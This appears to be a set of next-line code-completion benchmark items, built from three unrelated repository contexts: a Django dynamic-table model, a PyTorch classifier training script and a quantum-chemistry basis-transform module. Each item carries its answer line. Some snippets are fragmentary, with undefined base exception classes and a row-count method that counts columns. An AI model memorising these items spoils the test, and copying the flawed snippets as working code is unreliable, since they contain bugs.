# Path: django_dynamic_table/errors.py
class DynamicTableError(Exception):
    pass

# Path: django_dynamic_table/errors.py
class UnSupportedDataType(TableColumnError):
    pass

# Path: django_dynamic_table/errors.py
class CantParseValueToDataType(CellValueError):
    pass

# Path: django_dynamic_table/errors.py
class CellDoesNotExist(CellValueError):
    pass

# Path: django_dynamic_table/models.py
from typing import Sequence
from datetime import datetime

from django.db import models
from django.utils import timezone
from django.utils.translation import gettext_lazy as _

from .errors import (
    TableHaveNoRow, TableHaveNoColumn, ColumnNotInTable, RowNotInTable,
    DuplicateColumnInTable, DynamicTableError, UnSupportedDataType,
    CantParseValueToDataType, CellDoesNotExist
)

"""
Creating a Dynamic Table using conventional Django standard
This Table gives you more control over it manipulation than Django models

Developed by: Samuel Effiong Nkopuruk
Email: [email protected]
"""

__SUPPORTED_DATA_TYPE_CHOICES__ = (
    ('char', 'Char'),
    ('int', 'Int'),
    ('float', 'Float'),
    ('bool', 'Bool'),
    ('textfield', 'TextField'),
    ('date', 'Date'),
)


# Create your models here.
class DynamicTable(models.Model):
    table_name = models.CharField(_('Table Name'), max_length=255, unique=True)
    table_description = models.TextField(_('Table Description'), blank=True)
    date_created = models.DateTimeField(_('Date Created'), default=timezone.now)

    table_columns = models.ManyToManyField('TableColumn', blank=True)
    table_rows = models.ManyToManyField('TableRow', blank=True)

    class Meta:
        ordering = ('-date_created', )

    def __str__(self) -> str:
        return f"{self.table_name}"

    def __total_table_rows(self) -> int:
        field = self.table_columns.first()
        if field and isinstance(field, TableColumn):
            return self.table_columns.all().count()
        else:
            # the table is empty
            return 0

    def __total_table_columns(self) -> int:
        return self.table_columns.all().count()

    def table_info(self) -> dict[str, int]:
        description = {
            'rows': self.__total_table_rows(),
            'columns': self.__total_table_columns()
        }
        return description

    def is_empty(self) -> bool:
        table_info = self.table_info()
        rows = table_info['rows']
        columns = table_info['columns']

        return True if columns == 0 or rows == 0 else False

    def is_column(self, column_name: str) -> bool:
        if not isinstance(column_name, str):
            raise ValueError("column name must be a str")
        try:
            column = self.table_columns.get(column_name=column_name)
            return True
        except TableColumn.DoesNotExist:
            return False

    def get_supported_data_types(self) -> list[str]:
        return [data_type[0] for data_type in __SUPPORTED_DATA_TYPE_CHOICES__]

    def data_type_is_supported(self, data_type: str | list) -> bool | list[bool]:
        supported_data_types = self.get_supported_data_types()
        if isinstance(data_type, str):
            return data_type.lower().strip() in supported_data_types
        elif isinstance(data_type, (list, tuple, set)):
            return [_type.lower().strip() in supported_data_types for _type in data_type]
        else:
            raise ValueError('arg must be either a str or a sequence')

    def add_column(self, column_name: str, data_type: str):
        if isinstance(column_name, str) and isinstance(data_type, str):
            if not self.data_type_is_supported(data_type):
                raise UnSupportedDataType()

            if self.is_column(column_name):
raise DuplicateColumnInTable()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: gsamil/text-classification

# Path: data.py
class ClassificationSample(BaseModel):
def preprocess_text(text: str) -> str:
def get_samples_from_file(file_path: str) -> list[ClassificationSample]:
def stratify_samples(
    samples: list[ClassificationSample], number_per_sample: int
) -> list[ClassificationSample]:
def save_categories(train_file: str) -> None:
def load_categories() -> Tuple[list[str], dict[str, int]]:
def set_feature_dimension(lst: list[int], target_length: int):
def print_text_lengths(train_file: str) -> None:

# Path: model.py
class HyperParameters(BaseModel):
class TrainingParameters(BaseModel):
class TextClassifier(nn.Module):
    def to_dict(self) -> dict[Any, Any]:
    def load_from_json(cls, file_path: str) -> "HyperParameters":
    def print(self):
    def to_dict(self) -> dict[Any, Any]:
    def load_from_json(cls, file_path: str) -> "TrainingParameters":
    def print(self):
    def __init__(self, hparameters: HyperParameters):
    def forward(self, x):
    def save_model(
        self, model_dir: str, training_parameters: TrainingParameters
    ) -> None:
    def load_from_dir(
        cls, model_dir: str, device: Union[str, torch.device]
    ) -> Tuple["TextClassifier", TrainingParameters]:

# Path: recommender/dataset.py
class ClassificationDataset(Dataset):
    def __init__(
        self,
        samples: list[ClassificationSample],
        vocab: dict[str, int],
        categories: list[str],
        category_to_idx: dict[str, int],
        feature_size: int,
        sample_negatives: int | None,
        shuffle: bool,
    ):
        self.data: list[ClassificationSample] = samples
        self.vocab: dict[str, int] = vocab
        self.categories: list[str] = categories
        self.category_to_idx: dict[str, int] = category_to_idx
        self.feature_size: int = feature_size
        self.sample_negatives: int | None = sample_negatives
        self.shuffle: bool = shuffle

    def __len__(self) -> int:
        return len(self.data)

    def __getitem__(self, idx) -> Tuple[torch.LongTensor, list[int], int]:
        example = self.data[idx]
        combined_features_positive = []
        combined_features_negative = []
        for category in self.categories:
            # this is the part where we convert product text and category to indexes
            product_text_tokens = [self.vocab[token] for token in example.product_text]
            category_tokens = [self.vocab[token] for token in category]
            product_text_token_indexes = set_feature_dimension(
                product_text_tokens,
                self.feature_size - len(category_tokens),
            )
            token_indexes = product_text_token_indexes + category_tokens
            if example.category == category:
                combined_features_positive.append(token_indexes)
            else:
                combined_features_negative.append(token_indexes)
        if self.sample_negatives is not None:
            combined_features_negative = random.sample(
                combined_features_negative, self.sample_negatives
            )
        combined_features_with_labels = [
            (feature, 1) for feature in combined_features_positive
        ] + [(feature, 0) for feature in combined_features_negative]
        if self.shuffle:
            random.shuffle(combined_features_with_labels)
        return (
            torch.LongTensor([f for f, _ in combined_features_with_labels]),
            [l for _, l in combined_features_with_labels],
            [i for i, (_, l) in enumerate(combined_features_with_labels) if l == 1][0],
        )

# Path: settings.py
CATEGORIES_PATH = "./data/categories.csv"

# Path: recommender/train.py
import torch
import time
import os

from torch import nn
from torch.utils.data import DataLoader
from torch.optim.lr_scheduler import ExponentialLR

from data import (
    vocab,
    get_samples_from_file,
    stratify_samples,
    save_categories,
    load_categories,
)
from model import TextClassifier, TrainingParameters, device, HyperParameters
from recommender.dataset import ClassificationDataset
from settings import CATEGORIES_PATH

# Set `train_file`, `test_file` and `model_dir` apropriately.
# Set `negative_samples` to the number of negative samples you want to use.
# run with `export PYTHONPATH=. && python recommender/train.py` in the main directory.

train_file = "./data/train_cleaned.csv"
test_file = "./data/test_cleaned.csv"
model_dir = "./recommender/saved_model"

if __name__ == "__main__":
    hparams = HyperParameters(
vocab_size=len(vocab),
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.

====REPOSITORY====
# Repo Name: zhcui/polar_preview

# Path: polar/utils/misc.py
def mdot(*args):
    """
    Reduced matrix dot.
    """
    return reduce(np.dot, args)

# Path: polar/utils/misc.py
def kdot(a, b):
    """
    Matrix dot with kpoints.
    """
    ka, s1_a, _ = a.shape
    kb, _, s2_b = b.shape
    assert ka == kb
    res = np.zeros((ka, s1_a, s2_b), dtype=np.result_type(a.dtype, b.dtype))
    for k in range(ka):
        np.dot(a[k], b[k], out=res[k])
    return res

# Path: polar/utils/misc.py
def get_spin_dim(arrays, non_spin_dim=3):
    """
    Get spin dimension for a list of arrays.
    """
    spin = 1
    for a in arrays:
        a = np.asarray(a)
        if a.ndim == non_spin_dim:
            continue
        elif a.ndim == non_spin_dim + 1:
            spin = max(spin, a.shape[0])
        else:
            raise ValueError
    return spin

# Path: polar/utils/misc.py
def add_spin_dim(H, spin, non_spin_dim=3):
    """
    Add an additional dimension to array H.
    """
    H = np.asarray(H)
    if H.ndim == non_spin_dim:
        H = H[None]
    assert H.ndim == (non_spin_dim + 1)
    if H.shape[0] < spin:
        H = np.asarray((H[0],) * spin)
    return H

# Path: polar/basis/trans_1e.py
import numpy as np
import scipy.linalg as la

from polar.utils.misc import (mdot, kdot, get_spin_dim, add_spin_dim)

#!/usr/bin/env python
"""
Transform 1e quantities.

Authors:
    Zhi-Hao Cui
    Tianyu Zhu
    Shunyue Yuan
"""

# *****************************************************************************
# Transform functions AO -> LO and LO -> AO
# for h1 and rdm1
# *****************************************************************************

def trans_h1_to_lo(h_ao_ao, C_ao_lo):
    r"""
    Transform h1 to lo basis, with kpts.
    h^{LO} = C^{\dagger} h^{AO} C
    """
    h_ao_ao = np.asarray(h_ao_ao)
    C_ao_lo = np.asarray(C_ao_lo)
    nkpts = C_ao_lo.shape[-3]
    nlo = C_ao_lo.shape[-1]
    res_type = np.result_type(h_ao_ao.dtype, C_ao_lo.dtype)

    # treat the special case where h is 0 or [0, 0]
    if h_ao_ao.ndim == 0:  # scalar
        return np.ones((nkpts, nlo, nlo), dtype=res_type) * h_ao_ao
    elif h_ao_ao.ndim == 1:  # [0, 0]
        spin = len(h_ao_ao)
        h_lo_lo = np.ones((spin, nkpts, nlo, nlo), dtype=res_type)
        for s in range(spin):
            h_lo_lo[s] *= h_ao_ao[s]
        return h_lo_lo

    if C_ao_lo.ndim == 3 and h_ao_ao.ndim == 3:
        h_lo_lo = np.zeros((nkpts, nlo, nlo), dtype=res_type)
        for k in range(nkpts):
h_lo_lo[k] = mdot(C_ao_lo[k].conj().T, h_ao_ao[k], C_ao_lo[k])